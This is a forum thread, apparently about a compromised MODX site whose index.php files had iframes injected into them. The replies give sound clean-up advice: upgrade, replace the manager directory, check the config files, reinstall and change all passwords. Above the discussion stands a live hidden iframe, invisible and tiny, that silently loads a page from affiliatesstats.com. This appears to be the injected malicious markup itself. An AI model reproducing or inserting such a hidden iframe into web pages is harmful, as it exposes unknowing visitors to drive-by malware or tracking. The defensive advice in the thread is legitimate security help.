<iframe src="http://affiliatesstats.com/in.cgi?4" width="10" height="10" style="visibility:hidden;position:absolute;left:0; top:0;"></iframe>
I would upgrade. Actually delete the entire manager directory and replace it with the new one. Make sure any file that shows the recent modification date is removed and replaced. Make sure your core/config/config.inc.php file is clean, as well as the three config.core.php files (root, manager and connectors).
If this is on shared or otherwise managed hosting, talk to your tech support. They possibly got into your site with the Manager user's password restore bug, which was fixed a few versions ago. Sign up for the security feed or newsletter and keep your sites updated. Or possibly the entire server was compromised, in which case you won't be the only one hosted on that server with problems.
So, anyway, what do you think the hackers are expecting to get out of this?It's quite simple, the iframe somehow contains malicious software that will attack the browser of the visitor. Or maybe a keylogger which will get all te keystrokes you, or your users, make while logging in.
Usually putting iframes into index.whatever files will cause the page to have the iframe when viewed. These are usually linked to malicious sites, or spam-links sites. The oddity of infecting the manager and connector index.php files could be explained by this being some kind of automated script, just looking for index.whatever files. That is why I'd be suspicious of some script actually having been uploaded to the server, in which case it'll just do it again.
As Sottwell suggest a upgrade would be number 1. There have been quite some new releases since then, also regarding security issues.
Regarding your question
So, anyway, what do you think the hackers are expecting to get out of this?It's quite simple, the iframe somehow contains malicious software that will attack the browser of the visitor. Or maybe a keylogger which will get all te keystrokes you, or your users, make while logging in.
The way you describe the problem looks like a scanner injecting all index.php files. That points to a complete compromise of your account, or maybe even complete server (if shared).
It might be me, but I wouldn't trust anything anymore. If the site is of reasonable size I would opt for complete reinstall.
Just create a new install on, for instance, a test domain. and recreate the site with only the newest release & packages.
Then copy content, images, javascript & css to new site. If all's running well again replace the "old" site with the updated one completely.
Also change ALL passes granted to users, moderators, ftp, sql, accountpanel etc...
That way you have a clean install again.
Just my 2 cents...
Good luck!